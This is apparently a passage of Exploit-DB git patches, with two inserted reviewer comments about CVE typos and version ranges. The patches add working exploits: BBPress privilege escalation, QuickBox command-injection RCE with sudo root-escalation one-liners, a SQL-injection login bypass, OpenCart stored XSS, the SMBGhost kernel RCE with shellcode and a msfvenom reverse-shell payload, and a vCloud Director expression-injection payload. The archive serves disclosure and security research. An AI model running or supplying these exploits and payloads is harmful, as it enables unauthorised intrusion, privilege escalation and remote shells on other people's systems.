Please enter the new password for this user [' + _sPASS + ']: ') + if not sAnswer == '': _sPASS = sAnswer + else: + _sIP = sys.argv[1] + if len(sys.argv) >= 3: + _sUSER = sys.argv[2] + bAdduser = True + if len(sys.argv) >= 4: _sPASS = sys.argv[3] + + ## MAIN + print('') + s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) + s.settimeout(_iTIMEOUT) + try: + s.connect((_sIP,_iPORT)) + except: + print('[-] Error: Host ' + _sIP + ':' + str(_iPORT) + ' not reachable') + sys.exit(1) + + performBind(s) + + if bAdduser: + sCode = performUserAdd(s, _sUSER, _sPASS) + + if not bAdduser: + print('[!] Checking vulnerability') + sCode, sMessage = performUserMod(s, 'Administrator', False) + if sCode == b'\x32': print('[-] This host is not vulnerable, message: ' + sMessage) + else: print('[+] This host is vulnerable!') + else: + sCode = performUserMod(s, _sUSER) + + performUnbind(s) + + s.close() + + +if __name__ == "__main__": + main() \ No newline at end of file diff --git a/exploits/php/webapps/48534.py b/exploits/php/webapps/48534.py new file mode 100755 index 000000000..c7bf7b794 --- /dev/null +++ b/exploits/php/webapps/48534.py 
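Review bot: The docstring and the usage text name the script `CVE-2020-3592.py`, but the header line and the referenced repository URL give the identifier as CVE-2020-3952; the digits are transposed in `File name CVE-2020-3592.py` and in the two `print` lines at the top of `main()`. Anyone searching tickets, logs or this archive by CVE number would miss the match, so all three should read `CVE-2020-3952.py`. The entry is also stored as `48535.txt` although its content is a Python 3 script, with the `#!/usr/bin/env python3` line sitting below the comment header; a one-line comment at the top noting this would avoid confusion. According to the header, the affected range is 6.7 before update 3f, and that is the remediation to point readers at.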
@@ -0,0 +1,58 @@ +# Exploit Title: Wordpress Plugin BBPress 2.5 - Unauthenticated Privilege Escalation +# Date: 2020-05-29 +# Exploit Author: Raphael Karger +# Software Link: https://codex.bbpress.org/releases/ +# Version: BBPress < 2.5 +# CVE: CVE-2020-13693 + +import argparse +import requests +import bs4 +import urllib3 +urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning) + +useragent = {"User-Agent" : "This is a real browser i swear"} + +def grab_nonce_login_page(url): + try: + login_page_request = requests.get(url, verify=False, timeout=10, headers=useragent) + soup = bs4.BeautifulSoup(login_page_request.text, "lxml") + action = soup.find("form", class_="bbp-login-form") + wp_login_page = action.get("action") + wp_nonce = action.find("input", id="_wpnonce").get("value") + return (wp_nonce, wp_login_page) + except Exception as nonce_error: + print("[-] Nonce Error: '{}'".format(nonce_error)) + return False + +def exploit(url, username, password, email): + info = grab_nonce_login_page(url) + if info: + nonce = info[0] + login_page = info[1] + try: + return requests.post(login_page, data={ + "user_login" : username, + "user_pass" : password, + "user_email" : email, + "user-submit" : "", + "user-cookie" : "1", + "_wpnonce" : nonce, + "bbp-forums-role" : "bbp_keymaster" + }, allow_redirects=False, verify=False, timeout=10, headers=useragent) + except Exception as e: + print("[-] Error Making Signup Post Request: '{}'".format(e)) + return False + +if __name__ == "__main__": + exit("asdasd") + parser = argparse.ArgumentParser() + parser.add_argument("-n", "--username", dest="username", help="Username of Newly Created Keymaster", default="raphaelrocks") + parser.add_argument("-p", "--password", dest="password", help="Password of Newly Created Keymaster", default="raphael123") + parser.add_argument("-e", "--email", dest="email", help="Email of Newly Created Keymaster", default="test@example.com") + parser.add_argument("-u", "--url", dest="url", help="URL 
of Page With Exposed Register Page.", required=True) + args = parser.parse_args() + site_exploit = exploit(args.url, args.username, args.password, args.email) + if site_exploit and site_exploit.status_code == 302: + exit("[+] Exploit Successful, Use Username: '{}' and Password: '{}'".format(args.username, args.password)) + print("[-] Exploit Failed") \ No newline at end of file diff --git a/exploits/php/webapps/48536.py b/exploits/php/webapps/48536.py new file mode 100755 index 000000000..9570332e2 --- /dev/null +++ b/exploits/php/webapps/48536.py 
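Review bot: The header's `# Version: BBPress < 2.5` does not agree with the title "BBPress 2.5" (repeated in the `files_exploits.csv` row), so the entry does not say clearly whether 2.5 itself is affected. The two should state the same range, and the fixed release should be named once it is confirmed against the vendor's release notes, since that is what an administrator needs from this record. Separately, the `__main__` block opens with `exit("asdasd")`, which leaves every line after it unreachable; a comment should say whether that stop is intentional.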
@@ -0,0 +1,53 @@ +# Exploit Title: QuickBox Pro 2.1.8 - Authenticated Remote Code Execution +# Date: 2020-05-26 +# Exploit Author: s1gh +# Vendor Homepage: https://quickbox.io/ +# Vulnerability Details: https://s1gh.sh/cve-2020-13448-quickbox-authenticated-rce/ +# Version: <= 2.1.8 +# Description: An authenticated low-privileged user can exploit a command injection vulnerability to get code-execution as www-data and escalate privileges to root due to weak sudo rules. +# Tested on: Debian 9 +# CVE: CVE-2020-13448 +# References: https://github.com/s1gh/QuickBox-Pro-2.1.8-Authenticated-RCE + +''' +Privilege escalation: After getting a reverse shell as the www-data user you can escalate to root in one of two ways. +1. sudo mysql -e '\! /bin/sh' +2. sudo mount -o bind /bin/sh /bin/mount;sudo mount + +''' + +#!/usr/bin/env python3 +# -*- coding: utf-8 -*- + +import requests +import argparse +import sys +from requests.packages.urllib3.exceptions import InsecureRequestWarning +from urllib.parse import quote_plus + +requests.packages.urllib3.disable_warnings(InsecureRequestWarning) + +def exploit(args): + s = requests.Session() + print('[*] Sending our payload...') + + s.post('https://' + args.ip + '/inc/process.php', data={'username': args.username, 'password': args.password, 'form_submission': 'login'}, verify=False) + try: + s.get('https://' + args.ip + '/index.php?id=88&servicestart=a;' + quote_plus(args.cmd) + ';', verify=False) + except requests.exceptions.ReadTimeout: + pass + +def main(): + parser = argparse.ArgumentParser(description="Authenticated RCE for QuickBox Pro <= v2.1.8") + parser.add_argument('-i',dest='ip',required=True,help="Target IP Address") + parser.add_argument('-u',dest='username',required=True,help="Username") + parser.add_argument('-p',dest='password',required=True,help="Password") + parser.add_argument('-c',dest='cmd', required=True, help="Command to execute") + args = parser.parse_args() + + exploit(args) + + +if __name__ == '__main__': + 
main() + sys.exit(0) \ No newline at end of file diff --git a/files_exploits.csv b/files_exploits.csv index f0b4b6136..1d33ec6a1 100644 --- a/files_exploits.csv +++ b/files_exploits.csv @@ -42761,3 +42761,6 @@ id,file,description,date,author,type,platform,port 48531,exploits/php/webapps/48531.py,"QNAP QTS and Photo Station 6.0.3 - Remote Command Execution",2020-05-28,Th3GundY,webapps,php, 48532,exploits/php/webapps/48532.txt,"WordPress Plugin Multi-Scheduler 1.0.0 - Cross-Site Request Forgery (Delete User)",2020-05-29,UnD3sc0n0c1d0,webapps,php, 48533,exploits/multiple/webapps/48533.py,"Crystal Shard http-protection 0.2.0 - IP Spoofing Bypass",2020-05-29,"Halis Duraki",webapps,multiple, +48534,exploits/php/webapps/48534.py,"Wordpress Plugin BBPress 2.5 - Unauthenticated Privilege Escalation",2020-06-01,"Raphael Karger",webapps,php, +48535,exploits/multiple/webapps/48535.txt,"VMware vCenter Server 6.7 - Authentication Bypass",2020-06-01,Photubias,webapps,multiple, +48536,exploits/php/webapps/48536.py,"QuickBox Pro 2.1.8 - Authenticated Remote Code Execution",2020-06-01,s1gh,webapps,php, From 34b629388a0520e521a10b12a3b41940b1af527b Mon Sep 17 00:00:00 2001 From: Offensive Security Date: Wed, 3 Jun 2020 05:01:54 +0000 Subject: [PATCH 05/17] DB: 2020-06-03 3 changes to exploits/shellcodes Microsoft Windows - 'SMBGhost' Remote Code Execution Clinic Management System 1.0 - Authentication Bypass OpenCart 3.0.3.2 - Stored Cross Site Scripting (Authenticated) --- exploits/php/webapps/48538.txt | 42 +++ exploits/php/webapps/48539.txt | 15 + exploits/windows/remote/48537.py | 513 +++++++++++++++++++++++++++++++ files_exploits.csv | 3 + 4 files changed, 573 insertions(+) create mode 100644 exploits/php/webapps/48538.txt create mode 100644 exploits/php/webapps/48539.txt create mode 100755 exploits/windows/remote/48537.py diff --git a/exploits/php/webapps/48538.txt b/exploits/php/webapps/48538.txt new file mode 100644 index 000000000..174a13be9 --- /dev/null 
+++ b/exploits/php/webapps/48538.txt
@@ -0,0 +1,42 @@
+# Exploit Title: Clinic Management System 1.0 - Authentication Bypass
+# Google Dork: N/A
+# Date: 2020-06-02
+# Exploit Author: BKpatron
+# Vendor Homepage: https://www.sourcecodester.com/php/14243/open-source-clinic-management-system-php-full-source-code.html
+# Software Link: https://www.sourcecodester.com/sites/default/files/download/Nikhil_B/clinic-full-source-code-with-database_0.zip
+# Version: v1.0
+# Tested on: Win 10
+# CVE: N/A
+# my website: bkpatron.com
+
+# Vulnerability: Attacker can bypass login page and access to dashboard page
+# vulnerable file : login.php
+# Parameter & Payload: '=''or'
+# Proof of Concept:
+http://localhost/source%20code/login.php
+
+POST /source%20code/login.php HTTP/1.1
+Host: localhost
+User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:56.0) Gecko/20100101 Firefox/56.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Content-Type: application/x-www-form-urlencoded
+Content-Length: 72
+Referer: http://localhost/source%20code/login.php
+Cookie: PHPSESSID=qdh5f7kelhhe9uvafveafit5e1
+Connection: keep-alive
+Upgrade-Insecure-Requests: 1
+user=admin&email=%27%3D%27%27or%27&password=%27%3D%27%27or%27&btn_login=: undefined
+
+HTTP/1.1 200 OK
+Date: Mon, 01 Jun 2020 19:52:17 GMT
+Server: Apache/2.4.39 (Win64) PHP/7.2.18
+X-Powered-By: PHP/7.2.18
+Expires: Thu, 19 Nov 1981 08:52:00 GMT
+Cache-Control: no-store, no-cache, must-revalidate
+Pragma: no-cache
+Content-Length: 4726
+Keep-Alive: timeout=5, max=100
+Connection: Keep-Alive
+Content-Type: text/html; charset=UTF-8
\ No newline at end of file
diff --git a/exploits/php/webapps/48539.txt b/exploits/php/webapps/48539.txt
new file mode 100644
index 000000000..cf949f330
--- /dev/null
+++ b/exploits/php/webapps/48539.txt
@@ -0,0 +1,15 @@
+# Exploit Title: OpenCart 3.0.3.2 - Stored Cross Site Scripting (Authenticated)
+# Date: 2020-06-01
+# Exploit Author: Kailash Bohara
+# Vendor Homepage: https://www.opencart.com
+# Software Link: https://www.opencart.com/index.php?route=cms/download
+# Version: OpenCart < 3.0.3.2
+# CVE : CVE-2020-10596
+
+1. Go to localhost.com/opencart/admin and login with credentials.
+
+2. Then navigate to System>Users>Users and click on Action button on top right corner.
+
+3. Now in image field , click on image and upload a new image. Before this select any image file and rename with this XSS payload "> and then upload it as new user profile image.
+
+4. After the upload completes the XSS pop-up executes as shown below and it will gets executed each time someone visits the Image manager section.
\ No newline at end of file
diff --git a/exploits/windows/remote/48537.py b/exploits/windows/remote/48537.py
new file mode 100755
index 000000000..fae1d25e2
--- /dev/null
+++ b/exploits/windows/remote/48537.py
@@ -0,0 +1,513 @@ +#!/usr/bin/env python +''' +# EDB Note ~ Download: https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/48537.zip + +# SMBGhost_RCE_PoC + +RCE PoC for CVE-2020-0796 "SMBGhost" + +For demonstration purposes only! Only use this a reference. Seriously. This has not been tested outside of my lab environment. It was written quickly and needs some work to be more reliable. Sometimes you BSOD. Using this for any purpose other than self education is an extremely bad idea. Your computer will burst in flames. Puppies will die. + +Now that that's out of the way.... + +Usage ex: + +``` +$SMBGhost_RCE_PoC python exploit.py -ip 192.168.142.131 +[+] found low stub at phys addr 13000! +[+] PML4 at 1ad000 +[+] base of HAL heap at fffff79480000000 +[+] ntoskrnl entry at fffff80645792010 +[+] found PML4 self-ref entry 1eb +[+] found HalpInterruptController at fffff79480001478 +[+] found HalpApicRequestInterrupt at fffff80645cb3bb0 +[+] built shellcode! +[+] KUSER_SHARED_DATA PTE at fffff5fbc0000000 +[+] KUSER_SHARED_DATA PTE NX bit cleared! +[+] Wrote shellcode at fffff78000000a00! +[+] Press a key to execute shellcode! +[+] overwrote HalpInterruptController pointer, should have execution shortly... +``` + +Replace payload in USER_PAYLOAD in exploit.py. Max of 600 bytes. If you want more, modify the kernel shell code yourself. + +lznt1 code from [here](https://github.com/you0708/lznt1). Modified to add a "bad compression" function to corrupt SRVNET buffer +header without causing a crash. 
+ +See this excellent write up by Ricera Security for more details on the methods I used: +https://ricercasecurity.blogspot.com/2020/04/ill-ask-your-body-smbghost-pre-auth-rce.html +''' + +import sys +import socket +import struct +import argparse + +from lznt1 import compress, compress_evil +from smb_win import smb_negotiate, smb_compress + +# Use lowstub jmp bytes to signature search +LOWSTUB_JMP = 0x1000600E9 +# Offset of PML4 pointer in lowstub +PML4_LOWSTUB_OFFSET = 0xA0 +# Offset of lowstub virtual address in lowstub +SELFVA_LOWSTUB_OFFSET = 0x78 +# Offset of NTOSKRNL entry address in lowstub +NTENTRY_LOWSTUB_OFFSET = 0x278 + +# Offset of hal!HalpApicRequestInterrupt pointer in hal!HalpInterruptController +HALP_APIC_REQ_INTERRUPT_OFFSET = 0x78 + +KUSER_SHARED_DATA = 0xFFFFF78000000000 + +# Offset of pNetRawBuffer in SRVNET_BUFFER_HDR +PNET_RAW_BUFF_OFFSET = 0x18 +# Offset of pMDL1 in SRVNET_BUFFER_HDR +PMDL1_OFFSET = 0x38 + +# Shellcode from kernel_shellcode.asm + +KERNEL_SHELLCODE = b"\x41\x50\x41\x51\x41\x55\x41\x57\x41\x56\x51\x52\x53\x56\x57\x4C" +KERNEL_SHELLCODE += b"\x8D\x35\xA0\x02\x00\x00\x49\x8B\x86\xD0\x00\x00\x00\x49\x8B\x9E" +KERNEL_SHELLCODE += b"\xD8\x00\x00\x00\x48\x89\x18\xFB\x49\x8B\x86\xE0\x00\x00\x00\x48" +KERNEL_SHELLCODE += b"\x2D\x00\x10\x00\x00\x66\x81\x38\x4D\x5A\x75\xF3\x49\x89\xC7\x4D" +KERNEL_SHELLCODE += b"\x89\xBE\xE0\x00\x00\x00\xBF\x78\x7C\xF4\xDB\xE8\xDA\x00\x00\x00" +KERNEL_SHELLCODE += b"\x49\x89\xC5\xBF\x3F\x5F\x64\x77\xE8\x2E\x01\x00\x00\x48\x89\xC1" +KERNEL_SHELLCODE += b"\xBF\xE1\x14\x01\x17\xE8\x21\x01\x00\x00\x48\x89\xC2\x48\x83\xC2" +KERNEL_SHELLCODE += b"\x08\x49\x8D\x74\x0D\x00\xE8\xFF\x00\x00\x00\x3D\xD8\x83\xE0\x3E" +KERNEL_SHELLCODE += b"\x74\x0A\x4D\x8B\x6C\x15\x00\x49\x29\xD5\xEB\xE5\xBF\x48\xB8\x18" +KERNEL_SHELLCODE += b"\xB8\x4C\x89\xE9\xE8\x91\x00\x00\x00\x49\x89\x06\x4D\x8B\x4D\x30" +KERNEL_SHELLCODE += b"\x4D\x8B\x45\x38\x49\x81\xE8\xF8\x02\x00\x00\x48\x31\xF6\x49\x81" +KERNEL_SHELLCODE += 
b"\xE9\xF8\x02\x00\x00\x41\x8B\x79\x74\x0F\xBA\xE7\x04\x73\x05\x4C" +KERNEL_SHELLCODE += b"\x89\xCE\xEB\x0C\x4D\x39\xC8\x4D\x8B\x89\xF8\x02\x00\x00\x75\xDE" +KERNEL_SHELLCODE += b"\x48\x85\xF6\x74\x40\x49\x8D\x4E\x08\x48\x89\xF2\x4D\x31\xC0\x4C" +KERNEL_SHELLCODE += b"\x8D\x0D\xB9\x00\x00\x00\x52\x41\x50\x41\x50\x41\x50\xBF\xC4\x5C" +KERNEL_SHELLCODE += b"\x19\x6D\x48\x83\xEC\x20\xE8\x2F\x00\x00\x00\x48\x83\xC4\x40\x49" +KERNEL_SHELLCODE += b"\x8D\x4E\x08\xBF\x34\x46\xCC\xAF\x48\x83\xEC\x20\xE8\x19\x00\x00" +KERNEL_SHELLCODE += b"\x00\x48\x83\xC4\x20\xFA\x48\x89\xD8\x5F\x5E\x5B\x5A\x59\x41\x5E" +KERNEL_SHELLCODE += b"\x41\x5F\x41\x5D\x41\x59\x41\x58\xFF\xE0\xE8\x02\x00\x00\x00\xFF" +KERNEL_SHELLCODE += b"\xE0\x53\x51\x56\x41\x8B\x47\x3C\x4C\x01\xF8\x8B\x80\x88\x00\x00" +KERNEL_SHELLCODE += b"\x00\x4C\x01\xF8\x50\x8B\x48\x18\x8B\x58\x20\x4C\x01\xFB\xFF\xC9" +KERNEL_SHELLCODE += b"\x8B\x34\x8B\x4C\x01\xFE\xE8\x1F\x00\x00\x00\x39\xF8\x75\xEF\x58" +KERNEL_SHELLCODE += b"\x8B\x58\x24\x4C\x01\xFB\x66\x8B\x0C\x4B\x8B\x58\x1C\x4C\x01\xFB" +KERNEL_SHELLCODE += b"\x8B\x04\x8B\x4C\x01\xF8\x5E\x59\x5B\xC3\x52\x31\xC0\x99\xAC\xC1" +KERNEL_SHELLCODE += b"\xCA\x0D\x01\xC2\x85\xC0\x75\xF6\x92\x5A\xC3\xE8\xA1\xFF\xFF\xFF" +KERNEL_SHELLCODE += b"\x80\x78\x02\x80\x77\x05\x0F\xB6\x40\x03\xC3\x8B\x40\x03\xC3\x41" +KERNEL_SHELLCODE += b"\x57\x41\x56\x57\x56\x48\x8B\x05\x0A\x01\x00\x00\x48\x8B\x48\x18" +KERNEL_SHELLCODE += b"\x48\x8B\x49\x20\x48\x8B\x09\x66\x83\x79\x48\x18\x75\xF6\x48\x8B" +KERNEL_SHELLCODE += b"\x41\x50\x81\x78\x0C\x33\x00\x32\x00\x75\xE9\x4C\x8B\x79\x20\xBF" +KERNEL_SHELLCODE += b"\x5E\x51\x5E\x83\xE8\x58\xFF\xFF\xFF\x49\x89\xC6\x4C\x8B\x3D\xB3" +KERNEL_SHELLCODE += b"\x01\x00\x00\x31\xC0\x44\x0F\x22\xC0\x48\x8D\x15\x8E\x01\x00\x00" +KERNEL_SHELLCODE += b"\x89\xC1\x48\xF7\xD1\x49\x89\xC0\xB0\x40\x50\xC1\xE0\x06\x50\x49" +KERNEL_SHELLCODE += b"\x89\x01\x48\x83\xEC\x20\xBF\xEA\x99\x6E\x57\xE8\x1A\xFF\xFF\xFF" +KERNEL_SHELLCODE += 
b"\x48\x83\xC4\x30\x48\x8B\x3D\x63\x01\x00\x00\x48\x8D\x35\x77\x00" +KERNEL_SHELLCODE += b"\x00\x00\xB9\x1D\x00\x00\x00\xF3\xA4\x48\x8D\x35\x6E\x01\x00\x00" +KERNEL_SHELLCODE += b"\xB9\x58\x02\x00\x00\xF3\xA4\x48\x8D\x0D\xD8\x00\x00\x00\x65\x48" +KERNEL_SHELLCODE += b"\x8B\x14\x25\x88\x01\x00\x00\x4D\x31\xC0\x4C\x8D\x0D\x46\x00\x00" +KERNEL_SHELLCODE += b"\x00\x41\x50\x6A\x01\x48\x8B\x05\x22\x01\x00\x00\x50\x41\x50\x48" +KERNEL_SHELLCODE += b"\x83\xEC\x20\xBF\xC4\x5C\x19\x6D\xE8\xBD\xFE\xFF\xFF\x48\x83\xC4" +KERNEL_SHELLCODE += b"\x40\x48\x8D\x0D\x9E\x00\x00\x00\x4C\x89\xF2\x4D\x31\xC9\xBF\x34" +KERNEL_SHELLCODE += b"\x46\xCC\xAF\x48\x83\xEC\x20\xE8\x9E\xFE\xFF\xFF\x48\x83\xC4\x20" +KERNEL_SHELLCODE += b"\x5E\x5F\x41\x5E\x41\x5F\xC3\x90\xC3\x48\x92\x31\xC9\x51\x51\x49" +KERNEL_SHELLCODE += b"\x89\xC9\x4C\x8D\x05\x0D\x00\x00\x00\x89\xCA\x48\x83\xEC\x20\xFF" +KERNEL_SHELLCODE += b"\xD0\x48\x83\xC4\x30\xC3\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58" +KERNEL_SHELLCODE += b"\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58" +KERNEL_SHELLCODE += b"\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58" +KERNEL_SHELLCODE += b"\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58" +KERNEL_SHELLCODE += b"\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58" +KERNEL_SHELLCODE += b"\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58" +KERNEL_SHELLCODE += b"\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58" +KERNEL_SHELLCODE += b"\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58" +KERNEL_SHELLCODE += b"\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58" +KERNEL_SHELLCODE += b"\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58" +KERNEL_SHELLCODE += b"\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58" +KERNEL_SHELLCODE += b"\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58" +KERNEL_SHELLCODE += 
b"\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x00\x00" +KERNEL_SHELLCODE += b"\x00\x00\x00\x00\x00\x00" + +# Reverse shell generated by msfvenom. Can you believe I had to download Kali Linux for this shit? + +USER_PAYLOAD = b"" +USER_PAYLOAD += b"\xfc\x48\x83\xe4\xf0\xe8\xc0\x00\x00\x00\x41\x51\x41" +USER_PAYLOAD += b"\x50\x52\x51\x56\x48\x31\xd2\x65\x48\x8b\x52\x60\x48" +USER_PAYLOAD += b"\x8b\x52\x18\x48\x8b\x52\x20\x48\x8b\x72\x50\x48\x0f" +USER_PAYLOAD += b"\xb7\x4a\x4a\x4d\x31\xc9\x48\x31\xc0\xac\x3c\x61\x7c" +USER_PAYLOAD += b"\x02\x2c\x20\x41\xc1\xc9\x0d\x41\x01\xc1\xe2\xed\x52" +USER_PAYLOAD += b"\x41\x51\x48\x8b\x52\x20\x8b\x42\x3c\x48\x01\xd0\x8b" +USER_PAYLOAD += b"\x80\x88\x00\x00\x00\x48\x85\xc0\x74\x67\x48\x01\xd0" +USER_PAYLOAD += b"\x50\x8b\x48\x18\x44\x8b\x40\x20\x49\x01\xd0\xe3\x56" +USER_PAYLOAD += b"\x48\xff\xc9\x41\x8b\x34\x88\x48\x01\xd6\x4d\x31\xc9" +USER_PAYLOAD += b"\x48\x31\xc0\xac\x41\xc1\xc9\x0d\x41\x01\xc1\x38\xe0" +USER_PAYLOAD += b"\x75\xf1\x4c\x03\x4c\x24\x08\x45\x39\xd1\x75\xd8\x58" +USER_PAYLOAD += b"\x44\x8b\x40\x24\x49\x01\xd0\x66\x41\x8b\x0c\x48\x44" +USER_PAYLOAD += b"\x8b\x40\x1c\x49\x01\xd0\x41\x8b\x04\x88\x48\x01\xd0" +USER_PAYLOAD += b"\x41\x58\x41\x58\x5e\x59\x5a\x41\x58\x41\x59\x41\x5a" +USER_PAYLOAD += b"\x48\x83\xec\x20\x41\x52\xff\xe0\x58\x41\x59\x5a\x48" +USER_PAYLOAD += b"\x8b\x12\xe9\x57\xff\xff\xff\x5d\x49\xbe\x77\x73\x32" +USER_PAYLOAD += b"\x5f\x33\x32\x00\x00\x41\x56\x49\x89\xe6\x48\x81\xec" +USER_PAYLOAD += b"\xa0\x01\x00\x00\x49\x89\xe5\x49\xbc\x02\x00\x7a\x69" +USER_PAYLOAD += b"\xc0\xa8\x8e\x01\x41\x54\x49\x89\xe4\x4c\x89\xf1\x41" +USER_PAYLOAD += b"\xba\x4c\x77\x26\x07\xff\xd5\x4c\x89\xea\x68\x01\x01" +USER_PAYLOAD += b"\x00\x00\x59\x41\xba\x29\x80\x6b\x00\xff\xd5\x50\x50" +USER_PAYLOAD += b"\x4d\x31\xc9\x4d\x31\xc0\x48\xff\xc0\x48\x89\xc2\x48" +USER_PAYLOAD += b"\xff\xc0\x48\x89\xc1\x41\xba\xea\x0f\xdf\xe0\xff\xd5" +USER_PAYLOAD += b"\x48\x89\xc7\x6a\x10\x41\x58\x4c\x89\xe2\x48\x89\xf9" 
+USER_PAYLOAD += b"\x41\xba\x99\xa5\x74\x61\xff\xd5\x48\x81\xc4\x40\x02" +USER_PAYLOAD += b"\x00\x00\x49\xb8\x63\x6d\x64\x00\x00\x00\x00\x00\x41" +USER_PAYLOAD += b"\x50\x41\x50\x48\x89\xe2\x57\x57\x57\x4d\x31\xc0\x6a" +USER_PAYLOAD += b"\x0d\x59\x41\x50\xe2\xfc\x66\xc7\x44\x24\x54\x01\x01" +USER_PAYLOAD += b"\x48\x8d\x44\x24\x18\xc6\x00\x68\x48\x89\xe6\x56\x50" +USER_PAYLOAD += b"\x41\x50\x41\x50\x41\x50\x49\xff\xc0\x41\x50\x49\xff" +USER_PAYLOAD += b"\xc8\x4d\x89\xc1\x4c\x89\xc1\x41\xba\x79\xcc\x3f\x86" +USER_PAYLOAD += b"\xff\xd5\x48\x31\xd2\x48\xff\xca\x8b\x0e\x41\xba\x08" +USER_PAYLOAD += b"\x87\x1d\x60\xff\xd5\xbb\xf0\xb5\xa2\x56\x41\xba\xa6" +USER_PAYLOAD += b"\x95\xbd\x9d\xff\xd5\x48\x83\xc4\x28\x3c\x06\x7c\x0a" +USER_PAYLOAD += b"\x80\xfb\xe0\x75\x05\xbb\x47\x13\x72\x6f\x6a\x00\x59" +USER_PAYLOAD += b"\x41\x89\xda\xff\xd5" + + +PML4_SELFREF = 0 +PHAL_HEAP = 0 +PHALP_INTERRUPT = 0 +PHALP_APIC_INTERRUPT = 0 +PNT_ENTRY = 0 + +max_read_retry = 3 +overflow_val = 0x1100 +write_unit = 0xd0 +pmdl_va = KUSER_SHARED_DATA + 0x900 +pmdl_mapva = KUSER_SHARED_DATA + 0x800 +pshellcodeva = KUSER_SHARED_DATA + 0xa00 + + +class MDL: + def __init__(self, map_va, phys_addr): + self.next = struct.pack("> 12 + self.phys_addr1 = struct.pack("> (40 - 1))) + pdpt_index = (((1 << 9) - 1) & (va_addr >> (31 - 1))) + pdt_index = (((1 << 9) - 1) & (va_addr >> (22 - 1))) + pt_index = (((1 << 9) - 1) & (va_addr >> (13 - 1))) + + pml4e = PML4 + pml4_index*0x8 + pdpt_buff = read_physmem_primitive(ip, port, pml4e) + + if pdpt_buff is None: + sys.exit("[-] physical read primitive failed") + + pdpt = struct.unpack("> 9 + lb = (0xFFFF << 48) | (PML4_SELFREF << 39) + ub = ((0xFFFF << 48) | (PML4_SELFREF << 39) + + 0x8000000000 - 1) & 0xFFFFFFFFFFFFFFF8 + pt = pt | lb + pt = pt & ub + + return pt + + +def overwrite_pte(ip, port, addr): + phys_addr = get_phys_addr(ip, port, addr) + + buff = read_physmem_primitive(ip, port, phys_addr) + + if buff is None: + sys.exit("[-] read primitive failed!") + 
+ pte_val = struct.unpack(" 3: + PHALP_INTERRUPT = index + i - 0x40 + print("[+] found HalpInterruptController at %lx" + % PHALP_INTERRUPT) + + if len(buff) < i + 0x40: + buff = read_physmem_primitive(ip, port, index + i + 0x38) + PHALP_APIC_INTERRUPT = struct.unpack("> 3 + + print("[+] found PML4 self-ref entry %0x" % PML4_SELFREF) + + +def find_low_stub(ip, port): + global PML4 + global PHAL_HEAP + global PNT_ENTRY + + limit = 0x100000 + index = 0x1000 + + while index < limit: + buff = read_physmem_primitive(ip, port, index) + + if buff is None: + sys.exit("[-] physical read primitive failed!") + + entry = struct.unpack(" Date: Thu, 4 Jun 2020 05:01:55 +0000 Subject: [PATCH 06/17] DB: 2020-06-04 1 changes to exploits/shellcodes vCloud Director 9.7.0.15498291 - Remote Code Execution --- exploits/linux/remote/48540.py | 139 +++++++++++++++++++++++++++++++++ files_exploits.csv | 1 + 2 files changed, 140 insertions(+) create mode 100755 exploits/linux/remote/48540.py diff --git a/exploits/linux/remote/48540.py b/exploits/linux/remote/48540.py new file mode 100755 index 000000000..ccf96e268 --- /dev/null +++ b/exploits/linux/remote/48540.py 
@@ -0,0 +1,139 @@ +#!/usr/bin/python +# Exploit Title: vCloud Director - Remote Code Execution +# Exploit Author: Tomas Melicher +# Technical Details: https://citadelo.com/en/blog/full-infrastructure-takeover-of-vmware-cloud-director-CVE-2020-3956/ +# Date: 2020-05-24 +# Vendor Homepage: https://www.vmware.com/ +# Software Link: https://www.vmware.com/products/cloud-director.html +# Tested On: vCloud Director 9.7.0.15498291 +# Vulnerability Description: +# VMware vCloud Director suffers from an Expression Injection Vulnerability allowing Remote Attackers to gain Remote Code Execution (RCE) via submitting malicious value as a SMTP host name. + +import argparse # pip install argparse +import base64, os, re, requests, sys +if sys.version_info >= (3, 0): + from urllib.parse import urlparse +else: + from urlparse import urlparse + +from requests.packages.urllib3.exceptions import InsecureRequestWarning +requests.packages.urllib3.disable_warnings(InsecureRequestWarning) + +PAYLOAD_TEMPLATE = "${''.getClass().forName('java.io.BufferedReader').getDeclaredConstructors()[1].newInstance(''.getClass().forName('java.io.InputStreamReader').getDeclaredConstructors()[3].newInstance(''.getClass().forName('java.lang.ProcessBuilder').getDeclaredConstructors()[0].newInstance(['bash','-c','echo COMMAND|base64 -di|bash|base64 -w 0']).start().getInputStream())).readLine()}" +session = requests.Session() + +def login(url, username, password, verbose): + target_url = '%s://%s%s'%(url.scheme, url.netloc, url.path) + res = session.get(target_url) + match = re.search(r'tenant:([^"]+)', res.content, re.IGNORECASE) + if match: + tenant = match.group(1) + else: + print('[!] 
